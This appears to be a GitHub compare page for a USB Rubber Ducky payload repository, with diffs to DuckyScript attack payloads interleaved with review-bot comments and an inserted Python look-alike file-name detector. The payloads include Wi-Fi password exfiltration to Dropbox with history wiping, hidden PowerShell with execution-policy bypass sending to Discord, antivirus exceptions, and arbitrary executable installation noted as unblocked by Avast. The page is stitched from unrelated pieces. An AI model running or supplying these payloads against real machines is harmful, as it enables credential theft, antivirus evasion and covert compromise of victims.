Compare commits


24 Commits

Author SHA1 Message Date
Aleff 29dbc6e431
Merge 0f1e1af17c into 675972662a 2024-09-24 21:21:00 -04:00
Peaks 675972662a
Merge pull request #484 from luu176/master
Exfiltrate NTLM hash using DS3
2024-09-24 19:27:52 -04:00
Luu 0df3011601
Update README.md 2024-09-25 00:23:30 +02:00
Luu a81ecd3e64
Update payload.txt 2024-09-25 00:21:49 +02:00
Luu c898ed7858
Create README.md 2024-09-25 00:20:06 +02:00
Luu 15f8f25701
Create payload.txt 2024-09-25 00:18:39 +02:00
Peaks adb9af43f8
Merge pull request #482 from aleff-github/patch-94
Same File Name Prank
2024-09-24 15:48:16 -04:00
Aleff 3cf199170c Update payload 2024-09-21 09:41:51 +02:00
Peaks fd272a60f4
Merge pull request #480 from aleff-github/patch-93
Replace Links In GithubDesktop
2024-09-20 14:03:29 -04:00
Aleff 9f1222ba05
Update payload.txt 2024-09-19 19:55:47 +02:00
Aleff d934d9d4de
removed a debug print 2024-09-18 19:31:24 +02:00
Aleff f031b928a8
Simple shifts in comments 2024-09-18 19:28:22 +02:00
Aleff bb89731ae2
Update payload.txt 2024-09-18 19:27:12 +02:00
Aleff 9c4257edbd Update README.md 2024-09-18 19:22:27 +02:00
Aleff d3e494fd12 Rename Everything Similarly
This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names.

Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled, the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed.

![No extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/1.png?raw=true)

> How renaming files using spaces appears on Windows when the extension is not shown. To the human eye they look identical.

![With extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/2.png?raw=true)

> What it looks like instead if you turn on the extension view.
2024-09-18 19:21:22 +02:00
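On the detection side, an added example (written for this page, not part of the commit or the repository): a Python check that groups the entries of a directory by the name a user perceives in a file manager with extensions hidden, so that names padded with trailing spaces or zero-width characters, as the commit above describes, are flagged as look-alikes. It assumes a POSIX file system that accepts such names; the sample directory it builds is constructed here for the demonstration.

```python
import os
import tempfile
import unicodedata
from collections import defaultdict

# Code points that render as nothing (or as a plain space) in most file
# managers and therefore make two different names look identical.
INVISIBLE = {"\u00a0", "\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}


def canonical(name):
    """Reduce a file name to what a person sees with extensions hidden:
    zero-width characters dropped, Unicode compatibility forms folded,
    and whitespace around the stem and the extension removed."""
    cleaned = "".join(ch for ch in name if ch not in INVISIBLE)
    cleaned = unicodedata.normalize("NFKC", cleaned)
    stem, ext = os.path.splitext(cleaned)
    return stem.strip() + ext.strip()


def find_lookalike_names(directory):
    """Group the entries of `directory` by canonical form and return only
    the groups with more than one member; each such group is a set of
    names a user cannot tell apart by eye."""
    groups = defaultdict(list)
    for entry in sorted(os.listdir(directory)):
        groups[canonical(entry)].append(entry)
    return {seen: raw for seen, raw in groups.items() if len(raw) > 1}


def describe(groups):
    """Render the groups with repr() so the trailing spaces and zero-width
    characters that distinguish the raw names become visible in a report."""
    lines = []
    for seen, raw in sorted(groups.items()):
        lines.append("%s -> %s" % (seen, ", ".join(repr(r) for r in raw)))
    return lines


def build_sample_dir():
    """Constructed test data (not from the repository): three files whose
    names collapse to 'report.txt' and one honest file."""
    d = tempfile.mkdtemp(prefix="lookalike_")
    for name in ("report.txt", "report .txt", "report\u200b.txt", "notes.txt"):
        with open(os.path.join(d, name), "w") as fh:
            fh.write("sample\n")
    return d


if __name__ == "__main__":
    sample = build_sample_dir()
    for line in describe(find_lookalike_names(sample)):
        print(line)
```

Run it against a real directory by replacing `build_sample_dir()` with the path to scan; any group printed is a set of entries that an extension-hiding file manager will display under one name.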
Peaks 02641718a0
Merge pull request #478 from aleff-github/patch-91
Install Any Arbitrary VSCode Extension
2024-09-17 18:06:23 -04:00
Aleff 2c84ff499c
Update payload.txt 2024-09-17 10:23:40 +02:00
Alessandro Greco b1fae99ade Update README.md 2024-09-16 14:54:17 +02:00
Alessandro Greco 52c42dfc10 Merge branch 'patch-93' of https://github.com/aleff-github/usbrubberducky-payloads into patch-93 2024-09-16 14:43:34 +02:00
Alessandro Greco 6e3f5924c0 Update payload.txt 2024-09-16 14:43:00 +02:00
Aleff 71d5eaf378
Bug in renderer regex
The link api.github.com needs to be correct
2024-09-16 14:42:11 +02:00
Alessandro Greco 1fa6cea874 [+] Replace Links In GithubDesktop
This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user.
2024-09-16 14:30:19 +02:00
Alessandro Greco 284195f4cd Install Any Arbitrary VSCode Extension
This DuckyScript script is designed to automate the installation of any arbitrary Visual Studio Code (VSCode) extension on Windows 10. It performs the following tasks:

1. Removes any pre-existing version of the extension (if applicable).
2. Downloads a ZIP archive of a VSCode extension.
3. Extracts the extension to the correct VSCode extensions folder.

The script makes use of PowerShell to manage file paths and execute commands necessary for the installation process. The user must provide the name of the extension folder and the link to the ZIP archive containing the extension.
2024-09-05 09:52:58 +02:00
Alessandro Greco 0f1e1af17c Several improvements in payloads
[+] Replacements of initial delays with DETECT_READY for GNU/Linux systems and PASSIVE_WINDOWS_DETECT for Windows systems.

[+] Replacement of STRING and ENTER with STRINGLN.

[+] Use of REM_BLOCK to make the code clearer.

[+] Order DEFINE variables at the beginning following the standard #EXAMPLE procedure.

[+] Various corrections, if any.
2024-09-02 12:25:43 +02:00
77 changed files with 3484 additions and 1154 deletions

View File

@ -1,27 +1,53 @@
REM #######################################################
REM # |
REM # Title : Exfiltrate Wifi Passwords - Linux |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Credentials, Execution |
REM # Target : Linux |
REM # |
REM #######################################################
REM_BLOCK
#######################################################
# #
# Title : Exfiltrate Wifi Passwords - Linux #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration, Credentials, Execution #
# Target : Linux #
# #
#######################################################
END_REM
REM Requirements:
REM - Permissions
REM - Internet connection
REM - Dropbox Token
DELAY 1000
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
REM #### PREREQUISITES SECTION ####
REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
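Review bot: `DELAY 1000` appears directly ahead of `EXTENSION DETECT_READY` in this hunk, while the commit message says fixed initial delays are being replaced by the extension; if that line is retained, the fixed wait is simply added to the dynamic one, so drop it (the loop's `#ITERATION_LIMIT 120` x `#RESPONSE_DELAY 25` already caps the wait at the documented 3000 ms). Separately, pasting the whole extension including its `REM_BLOCK DOCUMENTATION ... END_REM` into every payload means any fix to the extension must be re-applied file by file; keeping only the CONFIGURATION defines and the loop, with one REM pointing at the upstream extension file, would cut the duplication.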
@ -41,8 +67,6 @@ ENTER
REM #### ZIP SECTION ####
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
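Review bot: `STRING RANDOM=$(shuf -i 1-999999999999 -n 1)` assigns to bash's special `RANDOM` variable, which seeds the shell's generator instead of storing the value; any later `$RANDOM` expansion returns a number in 0..32767, not the shuf output. Use an ordinary name such as `RND` for the value and reference that in the ZIP section.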
@ -61,8 +85,6 @@ ENTER
REM #### WiFi && ZIP SECTION ####
REM Get all WiFi data
STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
ENTER
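Review bot: `for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do` breaks on connection names containing spaces (`$1` yields only the first word, and the unquoted `$(...)` word-splits). `nmcli -t -f NAME,TYPE connection show` gives a colon-separated, machine-readable list that can be read line by line with `while IFS=: read -r name type`, filtering on `type`.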
@ -85,8 +107,6 @@ DELAY 3000
REM #### EXFILTRATE SECTION ####
REM Set yout Dropbox folder name
DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/
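Review bot: typo in the context line `REM Set yout Dropbox folder name` (`yout` should be `your`); worth correcting while this section is touched.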
@ -105,8 +125,6 @@ ENTER
REM #### REMOVE TRACES ####
DELAY 2000
STRING history -c
ENTER

View File

@ -10,8 +10,49 @@ REM # |
REM ###################################################################
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 2000
GUI r
DELAY 250
STRING powershell -w h -ep bypass $discord='
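Review bot: `$_OS` is set by the inlined extension but never consulted; the hunk goes straight to `DELAY 2000` / `GUI r` / `STRING powershell -w h -ep bypass ...` whatever the detection result. Wrapping the rest of the payload in `IF ($_OS == WINDOWS) THEN ... END_IF`, exactly as the extension's own EXAMPLE USAGE block shows, would stop the PowerShell line from being typed into whatever happens to be focused on a non-Windows host. The `REM_BLOCK EXAMPLE USAGE AFTER EXTENSION ... END_REM` block itself is documentation and could be left out of the copied extension to keep the payload short.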

View File

@ -1,24 +1,65 @@
REM ########################################################
REM # |
REM # Title : Add An Exception To Avast Antivirus |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM ########################################################
REM_BLOCK
########################################################
# #
# Title : Add An Exception To Avast Antivirus #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
########################################################
END_REM
REM Requirements:
REM - Avast installed and configured
REM Set the full-path that you want to set as exception
DEFINE FULL-PATH example/to/path
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Avast application
DELAY 2000
GUI
DELAY 1000
STRING avast
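Review bot: `DEFINE FULL-PATH example/to/path` uses a hyphenated name and a forward-slash placeholder in a Windows 10/11 payload; the commit message says defines follow the standard `#EXAMPLE` form, so `DEFINE #FULL_PATH C:\path\to\example` would match that convention and make the expected format obvious. As in the other Windows payloads in this change, the `$_OS` result of the inlined `PASSIVE_WINDOWS_DETECT` is never checked before `GUI` / `STRING avast` start typing.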

View File

@ -1,13 +1,14 @@
REM ##############################################
REM # |
REM # Title : Call Someone On An iPhone |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : iPhone |
REM # |
REM ##############################################
REM_BLOCK
##############################################
# |
# Title : Call Someone On An iPhone |
# Author : Aleff |
# Version : 1.0 |
# Category : Execution |
# Target : iPhone |
# |
##############################################
END_REM
REM Requirements:
REM - The phone must be unlocked
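Review bot: the new `REM_BLOCK` header in this hunk keeps the `|` right border (`# Title : Call Someone On An iPhone |`) while every other header converted in this change closes each line with `#`; align it so the headers stay uniform across the repository.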

View File

@ -1,12 +1,14 @@
REM ###########################################
REM # |
REM # Title : Change Remote Git Link |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11/Linux |
REM # |
REM ###########################################
REM_BLOCK
###########################################
# #
# Title : Change Remote Git Link #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10-11/Linux #
# #
###########################################
END_REM
REM Requirements:
REM - Internet Connection

View File

@ -1,25 +1,50 @@
REM ###########################################
REM # |
REM # Title : Change Linux MAC Address |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ###########################################
REM_BLOCK
###########################################
# #
# Title : Change Linux MAC Address #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Linux #
# #
###########################################
END_REM
REM Requirements:
REM - Permissions
DELAY 1000
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
REM You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example

View File

@ -1,25 +1,49 @@
REM ###############################################
REM # |
REM # Title : Change Network Configuration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ###############################################
REM_BLOCK
###############################################
# #
# Title : Change Network Configuration #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Linux #
# #
###############################################
END_REM
REM Requirements:
REM - Permissions
DELAY 1000
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su

View File

@ -1,12 +1,14 @@
REM #############################################
REM # |
REM # Title : Change Windows User Name |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM #############################################
REM_BLOCK
#############################################
# #
# Title : Change Windows User Name #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
#############################################
END_REM
REM Requirements:
REM - Nothing
@ -17,8 +19,50 @@ REM - Payload tested on Windows 11 Eng
REM Set the new name that you want to set
DEFINE NEW_NAME example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Windows research
DELAY 2000
GUI
DELAY 1000
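Review bot: `REM Open Windows research` reads as a mistranslation; `REM Open Windows search` is what the following `GUI` / `DELAY 1000` actually does. The inlined `PASSIVE_WINDOWS_DETECT` sets `$_OS`, but nothing in this hunk checks it before typing begins; an `IF ($_OS == WINDOWS) THEN` guard around the rest of the payload would use the detection the extension was added for.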

View File

@ -1,12 +1,14 @@
REM ############################################################
REM # |
REM # Title : Change the password of the Windows user |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM ############################################################
REM_BLOCK
############################################################
# #
# Title : Change the password of the Windows user #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10-11 #
# #
############################################################
END_REM
REM Requirements:
REM - Nothing (i know it's absurd)
@ -14,7 +16,49 @@ REM - Nothing (i know it's absurd)
REM You must define the new Windows user password
DEFINE NEW_PASSWORD example
DELAY 1000
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI x
DELAY 500
STRING a
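Review bot: `DELAY 1000` sits directly before `EXTENSION PASSIVE_WINDOWS_DETECT`, whose documentation in the same hunk states that it "includes its own passive detect ready" and is meant to act as the boot delay; if the fixed delay is being retained rather than removed here, it only lengthens the payload for no benefit and should go, as the commit message describes for the other files.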

View File

@ -1,4 +1,4 @@
# Close All Applications - BADUSB ✅
# Close All Applications
A script used to close all target open applications.

View File

@ -1,27 +1,69 @@
REM #####################################################
REM # |
REM # Title : Close All Applications |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM #####################################################
REM_BLOCK
#####################################################
# #
# Title : Close All Applications #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10-11 #
# #
#####################################################
END_REM
REM Plug-And-Play
REM
REM 1. Open a powershell
REM 2. Download a Python script
REM 3. Execute it
REM 4. Remove Python script downloaded
REM 5. Delete powershell history
REM
REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
DEFINE POWERSHEL_CODE example.com
DELAY 2000
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI x
DELAY 250
DOWNARROW
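Review bot: the comment block and the define in this hunk disagree: steps 2-4 describe downloading, executing and deleting a Python script, while the next comment says the payload should be `close_all_app.ps1` (PowerShell), and `DEFINE POWERSHEL_CODE example.com` is misspelled (`POWERSHELL`) and holds a bare hostname where a full URL is expected. `REM Reply with YOUR LINK` should read `Replace with YOUR LINK`. If the define is renamed, every later reference to `POWERSHEL_CODE` in the file must change with it.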

View File

@ -1,12 +1,14 @@
REM ############################################################
REM # #
REM # Title : Defend yourself against AtlasVPN Bug-Door #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Execution #
REM # Target : Linux #
REM # #
REM ############################################################
REM_BLOCK
############################################################
# #
# Title : Defend yourself against AtlasVPN Bug-Door #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Linux #
# #
############################################################
END_REM
REM Requirements:
REM - Administrator Permission
@ -15,7 +17,34 @@ REM - AtlasVPN installed
REM Define the sudo user password
DEFINE #SUDO-PWS example
DELAY 1000
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
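Review bot: `DEFINE #SUDO-PWS example` names the sudo password define differently from the `SUDO_PASS` used by the other Linux payloads in this change (hyphen, `PWS` abbreviation), so the same value has two names across the repository; pick one form and use it everywhere. The `DELAY 1000` ahead of `EXTENSION DETECT_READY` duplicates the dynamic boot delay the extension provides, as noted for the other Linux payloads.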

View File

@ -1,14 +1,14 @@
REM ################################################################
REM # |
REM # Title : Edit The Default Real App With An Arbitrary |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : GNU/Linux (Debian based tested) |
REM # |
REM ################################################################
REM_BLOCK
################################################################
# #
# Title : Edit The Default Real App With An Arbitrary #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : GNU/Linux (Debian based tested) #
# #
################################################################
END_REM
REM Requirements:
REM - sudo permissions
@ -16,11 +16,9 @@ REM - Internet connection
REM - Executable app
REM - '.desktop' file
REM Note:
REM - The Depends* time depends by the app size, the connection fast and the computer power, you should test it
REM Set the link from wich will be downloaded the zip archive
DEFINE ARBITRARY_APP_LINK example
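Review bot: two comment lines in this hunk need wording fixes: `REM Set the link from wich will be downloaded the zip archive` should read `REM Set the link from which the zip archive will be downloaded`, and the note `The Depends* time depends by the app size, the connection fast and the computer power, you should test it` should read `The delay marked Depends* varies with the app size, connection speed and machine performance; test it on your setup`.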
@ -33,9 +31,35 @@ DEFINE ORIGINAL_DESKTOP_FILE_NAME example
REM sudo permissions needed
DEFINE SUDO example
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Open a shell
DELAY 2000
CTRL-ALT t
DELAY 1000

View File

@ -1,25 +1,50 @@
REM ################################################
REM # |
REM # Title : Exploiting An Executable File |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ################################################
REM_BLOCK
################################################
# #
# Title : Exploiting An Executable File #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Linux #
# #
################################################
END_REM
REM Requirements:
REM - Nothing, it is Plug-And-Play but you can change it as you want.
DELAY 1000
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
REM #### Script ####
STRINGLN
function search_file {
for file in "$1"/*; do

View File

@ -108,18 +108,12 @@ Happy Hacking!
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Discord
<br>Linkedin
</td>
</tr>
</table>
</div>
</div>
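Review bot: the label fix (`<br>Discord` becoming `<br>Linkedin` under the LinkedIn link) is right, but the surviving `<img src=https://github.com/...?raw=true width="48" height="48" />` lines still carry an unquoted `src` value containing `=`, which is a parse error for an unquoted attribute value in HTML5; quote it (`src="https://..."`) while this table is being edited.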

View File

@ -1,27 +1,67 @@
REM ###########################################################################################
REM # |
REM # Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM ###########################################################################################
REM_BLOCK
###########################################################################################
# #
# Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
###########################################################################################
END_REM
REM Requirements:
REM - Nothing
REM Define here your hexadecimal code
DEFINE #HEX_CODE example
REM Note:
REM - Tested on Windows 11
REM - Running checked but not blocked by Avast antivirus
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
